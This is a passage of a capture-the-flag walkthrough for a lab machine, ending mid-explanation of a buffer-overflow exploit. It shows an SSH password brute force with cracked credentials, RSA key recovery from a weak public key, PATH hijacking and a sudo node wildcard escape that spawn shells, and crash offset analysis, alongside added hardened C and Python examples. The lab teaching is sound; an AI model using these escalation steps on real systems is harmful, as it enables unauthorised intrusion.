[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://172.17.0.3:22/
[22][ssh] host: 172.17.0.3 login: txhaka password: iamoswe2023!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-13 21:58:33

Log in.

❯ ssh txhaka@172.17.0.3
The authenticity of host '172.17.0.3 (172.17.0.3)' can't be established.
ED25519 key fingerprint is SHA256:MclgaIFcKHnKBJxp/4+QZYCN7VmpZu/Qt2QEvqYriNo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.3' (ED25519) to the list of known hosts.
txhaka@172.17.0.3's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-60-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Feb 16 02:49:04 2023 from 172.17.0.1
txhaka@748760521d12:~$ cat flag.txt

█▀ █▀█ █  █   █▄▄ █▀█ █▀█ █  █▀▀ ▄▀█ █▄ █
▄█ ▀▀█ █▄▄ █   █▄█ █▄█ █▄█ █▄▄ ██▄ █▀█ █ ▀█

Flag 5: HELL{7H3_B00L34N_15_4150_4_VU1N}

The root password from the dump is valid inside this container too; SSH just refuses root logins, so switch user with su.

txhaka@748760521d12:~$ su root
Password:
root@748760521d12:/home/txhaka# cd ~
root@748760521d12:~# ls
creds flag.txt message.txt
root@748760521d12:~# cat flag.txt

█▀█ █▀█ █▀█ ▀█▀         ▄▀█ █▀▀ ▄▀█ █ █▄ █
█▀▄ █▄█ █▄█  █  ▄ ▄ ▄   █▀█ █▄█ █▀█ █ █ ▀█

Flag 6: HELL{7H3_5QL1_15_7H3_K3Y}

root@748760521d12:~# cat message.txt

From: [email protected]

Hi, I have left ssh credentials in the .enc file, remember to decrypt it with your private rsa key :)

Copy the files back to the attacking machine with scp (root cannot log in over SSH, so stage them in /tmp first and fetch them as txhaka).

root@748760521d12:~/creds# cp * /tmp/
---------------------------------------------------
❯ scp txhaka@172.17.0.3:/tmp/creds.enc .
txhaka@172.17.0.3's password:
creds.enc 100% 129 22.2KB/s 00:00
❯ scp txhaka@172.17.0.3:/tmp/public.crt .
txhaka@172.17.0.3's password:
public.crt 100% 451 177.3KB/s 00:00

RSA decryption

Decrypting the .enc file needs the private key, but the directory only holds the public key public.crt, and the key is small.

To get a private key anyway we need the arithmetic behind RSA.

Background reading: 一文详解 RSA 非对称加密算法 (an RSA explainer by bjxiaxueliang on 博客园).


The plan is to construct the private key ourselves.

First extract n (the modulus) and e (the public exponent) from the public key.

#!/usr/bin/env python3
from Crypto.PublicKey import RSA

with open("public.crt", "r") as f:
    key = RSA.import_key(f.read())
e = key.e
n = key.n
print("[+]e==>{}\n[+]n==>{}".format(e, n))

Run it:

❯ python3 exp.py
[+]e==>115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139
[+]n==>279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517

Look n up on factordb.com,

which returns its two prime factors p and q. factordb only knows factors that are already in its database or that fall out quickly, so this works for a weak challenge key, not for a properly generated one.


p=13833273097933021985630468334687187177001607666479238521775648656526441488361370235548415506716907370813187548915118647319766004327241150104265530014047083
q=20196596265430451980613413306694721666228452787816468878984356787652099472230934129158246711299695135541067207646281901620878148034692171475252446937792199

With p and q known, φ(n) = (p-1)(q-1), which expands to n-(p+q-1) (called m in the script).

d is the modular inverse of e modulo φ(n).

Generate the RSA private key file with Python.

#!/usr/bin/python3
from Crypto.PublicKey import RSA

n=279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517
e=115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139
p=13833273097933021985630468334687187177001607666479238521775648656526441488361370235548415506716907370813187548915118647319766004327241150104265530014047083
q=20196596265430451980613413306694721666228452787816468878984356787652099472230934129158246711299695135541067207646281901620878148034692171475252446937792199

# Euler's totient: phi(n) = (p-1)(q-1) = n - (p + q - 1)
m = n - (p + q - 1)

def egcd(a, b):
    # extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise ValueError("modular inverse does not exist")
    return x % m

# private exponent: d = e^-1 mod phi(n)
d = modinv(e, m)

key = RSA.construct((n, e, d, p, q))
print(key.exportKey().decode())

Run it:

❯ python3 exp.py|tee rsa
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAKBgQGN24SSfsyl/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd
gY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf
ytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk
zWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc
EZHPnIba0wZ/8+cgzNxpNmtkG/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW
i2CItuiV3AUIjKXT/TjdqXcW/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz
d6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B
A5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC
h6yTdJ5rMTFv3a7/hGGcpCucYiadTIxfIR0R1ey8/Oqe4HgwWz9YKZ1re02bL9fn
cIKouKi+xwIgSJiewFB8qwlK2nqa7tazd6DQtCKbEwXMl4BUeiJVRkcCIEiYnsBQ
fKsJStp6mu7Ws3eg0LQimxMFzJeAVHoiVUZHAkA3pS0IKm+cCT6r0fObMnPKoxur
bzwDyPPczkvzOAyTGsGUfeHhseLHZKVAvqzLbrEdTFo906cZWpLJAIEt8SD9
-----END RSA PRIVATE KEY-----

Use the private key to decrypt the .enc file (creds.enc is 129 bytes, exactly one block for this 1025-bit modulus).

That gives new credentials: pascual:vulnwhatsapp123!
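Added example, separate from the script above and not from the writeup: the same key reconstruction with the standard library only, plus the CRT values a PEM private key also carries and the PKCS#1 v1.5 unpadding that `openssl rsautl`/`pkeyutl` apply by default (an assumption about how creds.enc was produced; if the padding check fails, the file was made differently). The test primes 2^255-19 and 2^256-189 are chosen only so the self-test runs offline; they are not the challenge key.

```python
import math
import secrets
from dataclasses import dataclass

@dataclass
class RsaKey:
    n: int
    e: int
    d: int
    p: int
    q: int
    dp: int     # d mod (p-1)
    dq: int     # d mod (q-1)
    qinv: int   # q^-1 mod p; these three are the CRT fields in a PEM private key

def rsa_from_factors(n: int, e: int, p: int, q: int) -> RsaKey:
    """Rebuild the full private key from (n, e) and the factors of n.
    pow(e, -1, phi) is the stdlib modular inverse (Python >= 3.8)."""
    if p * q != n:
        raise ValueError("p*q != n: wrong factors")
    phi = (p - 1) * (q - 1)            # same as n - (p + q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e is not invertible mod phi(n)")
    d = pow(e, -1, phi)
    assert (e * d) % phi == 1          # sanity check on d before trusting it
    return RsaKey(n, e, d, p, q, d % (p - 1), d % (q - 1), pow(q, -1, p))

def rsa_decrypt_int(key: RsaKey, c: int) -> int:
    """c^d mod n computed with the CRT (Garner's recombination), as OpenSSL does."""
    m1 = pow(c, key.dp, key.p)
    m2 = pow(c, key.dq, key.q)
    h = (key.qinv * (m1 - m2)) % key.p
    return m2 + h * key.q

def block_size(n: int) -> int:
    return (n.bit_length() + 7) // 8

def decrypt_pkcs1_v15(key: RsaKey, ciphertext: bytes) -> bytes:
    """Strip PKCS#1 v1.5 type-2 padding: 00 02 <random non-zero bytes> 00 <msg>."""
    k = block_size(key.n)
    if len(ciphertext) != k:
        raise ValueError(f"expected {k} bytes of ciphertext, got {len(ciphertext)}")
    em = rsa_decrypt_int(key, int.from_bytes(ciphertext, "big")).to_bytes(k, "big")
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x02" or sep < 10:     # at least 8 padding bytes are mandatory
        raise ValueError("padding check failed: wrong key or not PKCS#1 v1.5")
    return em[sep + 1:]

def encrypt_pkcs1_v15(n: int, e: int, msg: bytes) -> bytes:
    """Public-key side; used here only to build a test vector."""
    k = block_size(n)
    if len(msg) > k - 11:
        raise ValueError("message too long for this modulus")
    ps = bytes(secrets.randbelow(255) + 1 for _ in range(k - 3 - len(msg)))
    em = b"\x00\x02" + ps + b"\x00" + msg
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")

# Constructed test key: two well-known primes giving a 511-bit modulus (64-byte
# blocks). Not the challenge key; substitute the n, e, p, q printed above for that.
P_TEST = 2**255 - 19
Q_TEST = 2**256 - 189
E_TEST = 65537

def self_test() -> bytes:
    key = rsa_from_factors(P_TEST * Q_TEST, E_TEST, P_TEST, Q_TEST)
    msg = b"user:password-from-the-enc-file"    # constructed plaintext
    return decrypt_pkcs1_v15(key, encrypt_pkcs1_v15(key.n, key.e, msg))

if __name__ == "__main__":
    print(self_test())
```

With the real values, call rsa_from_factors with the n, e, p and q from the page and pass the raw 129 bytes of creds.enc to decrypt_pkcs1_v15; block_size() will report 129 for that modulus, which is the first thing to check when a ciphertext length looks odd.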

Root privilege escalation

Log in over SSH.

flag 7 is in the home directory, and .bash_history shows the user once read their mail.

❯ ssh pascual@$ip
The authenticity of host '192.168.60.136 (192.168.60.136)' can't be established.
ED25519 key fingerprint is SHA256:aUSoZyYPezlPKdiG/TOw1clwpRm5PrR4RkQxZSy7JnE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.136' (ED25519) to the list of known hosts.
pascual@192.168.60.136's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-60-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

You have new mail.
Last login: Thu Feb 16 07:33:38 2023 from 192.168.193.129
pascual@hell:~$ cat flag.txt

█▀█ ▄▀█ █▀ █▀▀ █ █ ▄▀█ █  █▀█ █▀█ █▀█ █
█▀▀ █▀█ ▄█ █▄▄ █▄█ █▀█ █▄▄ █▀▄ █▄█ █▀▀ █

Flag 7: HELL{R54C7F7001_OR_M4NU41?}

pascual@hell:~$ cat .bash_history
………………省略………………
cat /var/mail/pascual
………………………………
exit
pascual@hell:~$ cat /var/mail/pascual

From: [email protected]

I have created a reports binary in /opt/reports/reports with which you can read the reports by passing an identifier as an argument to it

/opt holds a SUID binary owned by eddie.

Inspect it with strings.

pascual@hell:/opt/reports$ ls -la
total 24
drwx------ 2 pascual pascual 4096 Feb 16 2023 .
drwxr-xr-x 5 root root 4096 Feb 16 2023 ..
-rwsr-xr-x 1 eddie eddie 16208 Feb 16 2023 reports
pascual@hell:/opt/reports$ strings reports
/lib64/ld-linux-x86-64.so.2
__cxa_finalize
setreuid
__libc_start_main
system
strlen
sprintf
putchar
__stack_chk_fail
libc.so.6
GLIBC_2.4
GLIBC_2.34
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
v%H
[0;37m[
[0;31m-
[0;37m] Usage: %s <id for report>
[0;37m[
[0;31m-
[0;37m] The input must be an identifier digit
cat /home/eddie/report/%s
:*3$"
GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
ph.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
putchar@GLIBC_2.2.5
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
strlen@GLIBC_2.2.5
__stack_chk_fail@GLIBC_2.4
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
setreuid@GLIBC_2.2.5
__bss_start
main
sprintf@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

PATH hijacking

Its main function is to read the contents of files under /home/eddie/report/.

However, only digits are accepted as input; I guessed that directory traversal might be possible, but it is not.

pascual@hell:/opt/reports$ ./reports 1
Vulnerability: A Local File Inclusion has been detected in one of our web servers.

pascual@hell:/opt/reports$ ./reports 2
Vulnerability: SQL Injection has been detected in one of our servers.

pascual@hell:/opt/reports$ ./reports 3
Attention: Please fix this as soon as possible.

But notice that the cat it calls is not given as an absolute path, so PATH hijacking is possible.

This gets us the eddie user, and flag 8 is there.

pascual@hell:/tmp$ echo 'bash'>cat
pascual@hell:/tmp$ chmod +x cat
pascual@hell:/tmp$ export PATH=.:$PATH
pascual@hell:/tmp$ /opt/reports/reports 1

eddie@hell:~$ cd /home/eddie/
eddie@hell:/home/eddie$ ls
flag.txt report
eddie@hell:/home/eddie$ /bin/cat flag.txt

█▀▀ █▀▄ █▀▄ █ █▀▀ █▀▄ █▀█ ▀█▀ ▄▀█
██▄ █▄▀ █▄▀ █ ██▄ █▄▀ █▄█  █  █▀█

Flag 8: HELL{R3L4T1V3_R0U735_4R3_FUN!}
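
A hardened re-design of the reports logic, added here as an example and not the code of the box's binary: it accepts only an all-digit identifier, builds the path with snprintf and reads the file itself instead of handing "cat" to system(), so neither PATH nor a shell is involved. REPORT_DIR comes from the strings output above; MAX_ID_LEN and the function names are assumptions.

```c
/* Added example, not the binary from the box. Per the strings output, the
 * original builds "cat /home/eddie/report/%s" with sprintf and passes it to
 * system(), so the shell resolves "cat" through the caller's PATH. This
 * version never touches a shell or PATH: it validates the identifier, builds
 * the path with a bounded snprintf and copies the file itself. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define REPORT_DIR "/home/eddie/report/"   /* from the strings output */
#define MAX_ID_LEN 8                       /* constructed limit */

/* Only a short, all-digit identifier is accepted: no "..", "/", spaces or
 * shell metacharacters can ever reach the path. */
int report_id_is_valid(const char *id)
{
    size_t n = strlen(id);
    if (n == 0 || n > MAX_ID_LEN)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i]))
            return 0;
    return 1;
}

/* Builds REPORT_DIR + id into out. Returns 0 on success, -1 on an invalid
 * id or if the result would not fit (snprintf reports truncation). */
int build_report_path(const char *id, char *out, size_t outlen)
{
    if (!report_id_is_valid(id))
        return -1;
    int n = snprintf(out, outlen, "%s%s", REPORT_DIR, id);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* Copies the file at path to out without spawning anything. Returns the
 * number of bytes copied, or -1 if the file cannot be opened. */
long copy_report(const char *path, FILE *out)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    char buf[4096];
    long total = 0;
    size_t got;
    while ((got = fread(buf, 1, sizeof buf, f)) > 0) {
        fwrite(buf, 1, got, out);
        total += (long)got;
    }
    fclose(f);
    return total;
}

int main(int argc, char **argv)
{
    char path[256];
    if (argc != 2 || build_report_path(argv[1], path, sizeof path) != 0) {
        fputs("Usage: reports <id for report> (digits only)\n", stderr);
        return 1;
    }
    if (copy_report(path, stdout) < 0) {
        perror(path);
        return 1;
    }
    return 0;
}
```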

Search for all files owned by user eddie

eddie@hell:/home/eddie$ find / -user eddie 2>/dev/null |grep -Pv 'sys|proc'
/home/eddie
/home/eddie/flag.txt
/home/eddie/.ssh
/home/eddie/.cache
/home/eddie/.cache/motd.legal-displayed
/home/eddie/.local
/home/eddie/.local/share
/home/eddie/.local/share/nano
/home/eddie/.profile
/home/eddie/.bashrc
/home/eddie/.bash_logout
/home/eddie/report
/home/eddie/report/1
/home/eddie/report/2
/home/eddie/report/3
/var/mail/eddie
eddie@hell:/home/eddie$ /bin/cat /var/mail/eddie

From: [email protected]

Hi eddie, can you see my hacked facebook account, I leave you the last password I remember: MySuperSecurePassword123!

Wildcard path traversal

Guessing that the author reused the password again, try logging in as the sender, ghost.

eddie@hell:/home/eddie$ su ghost
Password:
ghost@hell:/home/eddie$ cd ~
ghost@hell:~$ ls
flag.txt message.txt
ghost@hell:~$ cat flag.txt

█▀█ █▄▄ █▀▀ ▀▄▀ █▀▀ █ █ █▀█ █▀ ▀█▀
█▄█ █▄█ █▀  █ █ █▄█ █▀█ █▄█ ▄█  █

Flag 9: HELL{B14CKH47_H4CK3R_F4C3B00K_WTF?}

ghost@hell:~$ cat message.txt

From: [email protected]

Hi ghost, just a heads up I created a script in node.js that converts text to hexadecimal, I'll leave it at my home directory for you to try, it's called hex.js :)

User ghost has sudo rights to run node.

ghost@hell:~$ sudo -l
[sudo] password for ghost:
Matching Defaults entries for ghost on hell:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User ghost may run the following commands on hell:
(gato) /usr/bin/node /home/gato/*

But a wildcard * follows the path, so directory traversal is possible.

Try escalating privileges.

Before that, gato must be able to read user ghost's files.

ghost@hell:~$ chmod 777 /home/ghost/
ghost@hell:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' > a.js
ghost@hell:~$ chmod +x a.js
ghost@hell:~$ sudo -u gato /usr/bin/node /home/gato/../ghost/a.js
$ bash
gato@hell:~$ cat flag.txt

█▀▀ ▄▀█ ▀█▀ █▀█ █▀▀ ▄▀█ █▀▄▀█ █▀▀ █▀█ ▄█ ▄█ █▀ █▀
█▄█ █▀█  █  █▄█ █▄█ █▀█ █ ▀ █ ██▄ █▀▄  █  █ ▄█ ▄█

Flag 10: HELL{7H3_5UD03R5_15_N07_4_60D_1D34}

Stack Overflow

Information gathering again

/opt/projects/strlen has the SUID bit set.

gato@hell:~$ find / -perm -u=s -type f 2>/dev/null
/opt/projects/strlen
/usr/bin/fusermount3
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/gpasswd
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
gato@hell:/opt$ cd projects/
gato@hell:/opt/projects$ ls -al
total 24
drwx------ 2 gato gato 4096 Feb 16 2023 .
drwxr-xr-x 5 root root 4096 Feb 16 2023 ..
-rwsr-xr-x 1 root root 13064 Feb 15 2023 strlen
gato@hell:/opt/projects$ strings strlen
/lib64/ld-linux-x86-64.so.2
Q9Ho
__libc_start_main
strcpy
puts
strlen
setuid
printf
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
__gmon_start__
PTE1
H=X4@
[0;37m[
[0;31m-
[0;37m] Usage: %s <string>
[0;37m[
[0;34m*
[0;37m] String: %s
[0;37m[
[0;32m+
[0;37m] Length: %lu
:*3$"
GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0
crt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
strlen.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
strcpy@GLIBC_2.2.5
puts@GLIBC_2.2.5
_edata
_fini
strlen@GLIBC_2.2.5
printf@GLIBC_2.2.5
overflow
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
_dl_relocate_static_pie
__bss_start
main
__TMC_END__
setuid@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment

I noticed that when the input exceeds 256 characters, a Segmentation fault (core dumped) occurs.

There is a stack overflow vulnerability.
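
The unsafe copy next to a bounded replacement, added here as an example and not the source of the box's strlen binary: the 256-byte buffer and the strcpy are reconstructed from the strings output and the crash at 264 bytes (256 bytes of buffer plus 8 of saved rbp); the function names and BUF_SIZE are assumptions.

```c
/* Added example, not the strlen binary from the box. The buffer size and the
 * strcpy are a reconstruction from the strings output and the crash
 * behaviour; everything else is an assumption. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Vulnerable pattern (reconstruction): strcpy copies until the NUL byte of
 * the argument, so anything longer than BUF_SIZE - 1 runs over the saved
 * rbp and the return address, which is exactly what the 264-byte offset
 * measured with cyclic shows. Kept only for contrast; never call it. */
unsigned long overflow_vulnerable(const char *s)
{
    char buf[BUF_SIZE];
    strcpy(buf, s);                      /* no length check */
    printf("[*] String: %s\n", buf);
    return strlen(buf);
}

/* Hardened: measure within the buffer bound first, refuse anything that
 * does not fit with its terminator, then copy exactly that many bytes.
 * Returns the length, or -1 if the input was rejected. */
long measure_string(const char *s)
{
    char buf[BUF_SIZE];
    /* memchr stops at the first NUL and never scans past BUF_SIZE bytes */
    const char *end = memchr(s, '\0', BUF_SIZE);
    if (end == NULL)                     /* BUF_SIZE bytes with no NUL */
        return -1;
    size_t n = (size_t)(end - s);        /* n <= BUF_SIZE - 1 */
    memcpy(buf, s, n);
    buf[n] = '\0';
    printf("[*] String: %s\n[+] Length: %zu\n", buf, n);
    return (long)n;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fputs("Usage: strlen <string>\n", stderr);
        return 1;
    }
    /* A SUID-root tool that parses untrusted argv should not be SUID at
     * all; if it must be, drop privileges before touching the input. */
    if (measure_string(argv[1]) < 0) {
        fputs("[-] Input too long\n", stderr);
        return 1;
    }
    return 0;
}
```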

Strategy one

The ROP chain is **padding + shellcode + rip**

First, use pwndbg to find the offset.

The offset is 264.

❯ gdb -q strlen
pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from strlen...
(No debugging symbols found in strlen)
------- tip of the day (disable with set show-tips off) -------
Use the spray command to spray memory with cyclic pattern or specified value
pwndbg> cyclic 300
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
pwndbg> r aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
Starting program: /home/Pepster/hmv/strlen aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

█▀ ▀█▀ █▀█ █  █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa

[+] Length: 300


Program received signal SIGSEGV, Segmentation fault.
0x0000000000401297 in overflow ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────
RAX 0x7fffffffdbf0 ◂— 0x6161616161616161 ('aaaaaaaa')
RBX 0x7fffffffde28 —▸ 0x7fffffffe134 ◂— '/home/Pepster/hmv/strlen'
RCX 0
RDX 0x19
RDI 0x7fffffffdca2 ◂— 'aaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
RSI 0x7fffffffe1ff ◂— 'aaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
R8 0x75
R9 0xfffffffd
R10 3
R11 0x7ffff7f18990 (__strcpy_avx2) ◂— vpxor xmm7, xmm7, xmm7
R12 0
R13 0x7fffffffde40 —▸ 0x7fffffffe27a ◂— 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus'
R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
R15 0x403220 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401180 (__do_global_dtors_aux) ◂— endbr64
RBP 0x6261616161616168 ('haaaaaab')
RSP 0x7fffffffdcf8 ◂— 'iaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
RIP 0x401297 (overflow+117) ◂— ret
─────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────
► 0x401297 <overflow+117> ret <0x6261616161616169>




──────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdcf8 ◂— 'iaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
01:0008│ 0x7fffffffdd00 ◂— 'jaaaaaabkaaaaaablaaaaaabmaaa'
02:0010│ 0x7fffffffdd08 ◂— 'kaaaaaablaaaaaabmaaa'
03:0018│ 0x7fffffffdd10 ◂— 'laaaaaabmaaa'
04:0020│ 0x7fffffffdd18 ◂— 0x7f006161616d /* 'maaa' */
05:0028│ 0x7fffffffdd20 —▸ 0x7fffffffde10 —▸ 0x7fffffffde18 ◂— 0x38 /* '8' */
06:0030│ 0x7fffffffdd28 —▸ 0x4011b6 (main) ◂— endbr64
07:0038│ 0x7fffffffdd30 ◂— 0x200400040 /* '@' */
────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────
► 0 0x401297 overflow+117
1 0x6261616161616169 None
2 0x626161616161616a None
3 0x626161616161616b None
4 0x626161616161616c None
5 0x7f006161616d None
6 0x7fffffffde10 None
7 0x4011b6 main
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264
pwndbg>

To add tolerance, the padding is set to \x90 (NOP).

Look for an address inside the NOPs to use as RIP, so that RIP points into the stack region where the padding forms the NOP sled (\x90).

Since the shellcode immediately follows the padding,

the role of RIP (the return address) is to jump into the shellcode.

Why a NOP sled: tolerance

